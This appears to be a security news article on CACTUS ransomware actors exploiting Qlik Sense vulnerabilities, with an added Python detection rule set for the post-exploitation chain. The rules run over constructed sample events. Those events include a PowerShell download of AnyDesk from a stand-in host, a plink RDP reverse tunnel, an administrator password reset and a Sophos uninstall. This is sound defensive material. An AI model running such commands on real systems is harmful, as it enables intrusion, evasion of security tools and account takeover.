CACTUS Ransomware
Cybersecurity researchers are warning about a CACTUS Ransomware campaign that capitalizes on newly disclosed security vulnerabilities in Qlik Sense, a cloud analytics and business intelligence platform. The campaign is a noteworthy development because it is the first documented case in which actors deploying the CACTUS Ransomware have used Qlik Sense vulnerabilities as their primary method of gaining initial access to targeted environments. It underscores the evolving tactics threat actors use to exploit weaknesses in popular software platforms for unauthorized access and potential data compromise.
The CACTUS Ransomware is Delivered via Several Software Vulnerabilities
Cybersecurity analysts have identified a series of attacks that appear to exploit three disclosed vulnerabilities spanning several months:
- CVE-2023-41265 (CVSS score: 9.9) - This vulnerability involves HTTP Request Tunneling, enabling a remote attacker to elevate their privileges and send requests executed by the backend server hosting the repository application.
- CVE-2023-41266 (CVSS score: 6.5) - A path traversal vulnerability that allows an unauthenticated, remote attacker to transmit HTTP requests to unauthorized endpoints.
- CVE-2023-48365 (CVSS score: 9.9) - An unauthenticated, remote code execution vulnerability resulting from improper validation of HTTP headers, allowing a remote attacker to elevate their privileges through tunneling HTTP requests.
It's important to note that CVE-2023-48365 is a consequence of an incomplete patch for CVE-2023-41265. Both vulnerabilities, along with CVE-2023-41266, were disclosed in late August 2023, and a fix for CVE-2023-48365 was implemented on September 20, 2023.
In the observed CACTUS Ransomware attacks, the identified vulnerabilities are exploited to abuse the Qlik Sense Scheduler service. This enables the attackers to spawn processes that download additional tools, with the aim of establishing persistence and setting up remote control.
The additional tools involved in these attacks include the ManageEngine Unified Endpoint Management and Security (UEMS), AnyDesk, and Plink. Notably, the threat actors have been observed uninstalling Sophos software, changing the administrator account password, and creating an RDP tunnel via Plink. The attack chains ultimately result in the deployment of the CACTUS Ransomware, with the attackers also utilizing clones for data exfiltration. This comprehensive attack strategy underscores the sophisticated and multi-stage nature of the CACTUS Ransomware campaign.
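The post-exploitation chain described above (a scheduler service spawning download processes, a remote-access tool being dropped, a Plink RDP tunnel, an administrator password change and the removal of endpoint protection) lends itself to host-based detection over process-creation telemetry. The following is an added example written for this page, not code from the original article, from Qlik or from any vendor: a small Python rule set run over constructed, Sysmon-style process-creation events. The Qlik Sense Scheduler binary name (Scheduler.exe), the event field layout, the file paths, the user names and the 198.51.100.10 address are assumptions or constructed sample values, not indicators from the campaign.

```python
"""Detection rules for the CACTUS / Qlik Sense post-exploitation chain.

Added example, not from the original article. Field layout, the
Scheduler.exe binary name, paths and addresses are assumptions;
all events below are constructed samples.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (constructed, Sysmon-like fields)."""
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Assumption: the Qlik Sense Scheduler service binary is Scheduler.exe.
QLIK_SCHEDULER = {"scheduler.exe"}
# Interpreters and download utilities a scheduler service has no reason to launch.
SHELLS_AND_DOWNLOADERS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                          "certutil.exe", "curl.exe", "bitsadmin.exe"}
# Remote-management tooling named in the article.
REMOTE_ACCESS_TOOLS = ("anydesk", "manageengine", "uems")


def scheduler_spawns_shell(e: ProcessEvent) -> bool:
    """Qlik Sense Scheduler launching a shell or downloader."""
    return (basename(e.parent_image) in QLIK_SCHEDULER
            and basename(e.image) in SHELLS_AND_DOWNLOADERS)


def remote_access_tool_activity(e: ProcessEvent) -> bool:
    """AnyDesk / ManageEngine UEMS referenced in image or command line."""
    text = f"{e.image} {e.command_line}".lower()
    return any(tool in text for tool in REMOTE_ACCESS_TOOLS)


def plink_rdp_tunnel(e: ProcessEvent) -> bool:
    """plink.exe with a port-forwarding flag (-R / -L) that references RDP (3389)."""
    if basename(e.image) != "plink.exe":
        return False
    toks = e.command_line.lower().split()
    forwards = any(t in {"-r", "-l"} or (len(t) > 2 and t[:2] in {"-r", "-l"}
                                         and t[2].isdigit()) for t in toks)
    return forwards and "3389" in e.command_line


def admin_password_reset(e: ProcessEvent) -> bool:
    """net user Administrator <new password>; '/active:no' style switches are ignored."""
    if basename(e.image) not in {"net.exe", "net1.exe"}:
        return False
    toks = e.command_line.lower().split()
    if "administrator" not in toks:
        return False
    i = toks.index("administrator")
    return "user" in toks[:i] and len(toks) > i + 1 and not toks[i + 1].startswith("/")


def security_tool_uninstall(e: ProcessEvent) -> bool:
    """Sophos removal via its uninstaller or msiexec /x."""
    text = f"{e.image} {e.command_line}".lower()
    return "sophos" in text and ("uninstall" in text or " /x " in text)


RULES: Dict[str, Callable[[ProcessEvent], bool]] = {
    "scheduler_spawns_shell": scheduler_spawns_shell,
    "remote_access_tool_activity": remote_access_tool_activity,
    "plink_rdp_tunnel": plink_rdp_tunnel,
    "admin_password_reset": admin_password_reset,
    "security_tool_uninstall": security_tool_uninstall,
}


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, e in enumerate(events)
            for name, rule in RULES.items() if rule(e)]


# Constructed sample telemetry (paths, users and 198.51.100.10 are invented).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
                 "Scheduler.exe", r"CONTOSO\qlik-svc"),                       # benign
    ProcessEvent(r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command Invoke-WebRequest http://198.51.100.10/AnyDesk.exe "
                 r"-OutFile C:\Temp\AnyDesk.exe", r"CONTOSO\qlik-svc"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Temp\plink.exe",
                 "plink.exe -R 3389:127.0.0.1:3389 -batch op@198.51.100.10", r"CONTOSO\qlik-svc"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
                 "net user Administrator NewPass-Example1", r"CONTOSO\qlik-svc"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Program Files\Sophos\Endpoint Defense\uninstall.exe",
                 r'"C:\Program Files\Sophos\Endpoint Defense\uninstall.exe" /quiet', r"CONTOSO\qlik-svc"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\net.exe",
                 "net user administrator /active:no", r"CONTOSO\itadmin"),     # benign
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Tools\plink.exe",
                 "plink.exe -load mysession", r"CONTOSO\itadmin"),             # benign
]

if __name__ == "__main__":
    for idx, rule_name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name} -> {SAMPLE_EVENTS[idx].command_line}")
```

Each rule maps to one step of the chain the article describes, so a single event firing `scheduler_spawns_shell` is already worth a ticket, and two or more rules firing on the same host within minutes is the sequence this campaign exhibits. The two benign events at the end show the false positives the rules are tuned to avoid: an administrator disabling an account with a `/active:no` switch and a Plink session loaded from a saved profile without a port forward.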
Ransomware Threat Actors are Evolving Their Techniques
The emergence of the CACTUS Ransomware reflects the increasing sophistication of the ransomware threat landscape. The underground economy has evolved to support large-scale attacks through a network of initial access brokers and botnet owners. These entities resell access to victim systems to multiple affiliate actors, contributing to the expansion of ransomware threats.
Despite global efforts by governments to combat ransomware, the Ransomware-as-a-Service (RaaS) business model remains a resilient and profitable method for extorting money from targets. The longevity and profitability of this model persist, allowing threat actors to adapt and continue their illicit activities.
One notable ransomware group, Black Basta, entered the scene in April 2022 and is estimated to have amassed illicit profits exceeding $107 million in Bitcoin ransom payments from over 90 victims. Recent joint research has revealed that a significant portion of these funds was laundered through Garantex, a Russian cryptocurrency exchange sanctioned by the U.S. government in April 2022 for facilitating transactions with the Hydra Dark Net marketplace.
Furthermore, the analysis has uncovered connections between Black Basta and the now-defunct Russian cybercrime group Conti, which ceased operations around the same time as Black Basta's emergence. Additionally, ties to QakBot, a tool used in deploying the ransomware, have been identified. This intricate web of associations underscores the complex and interconnected nature of modern ransomware operations.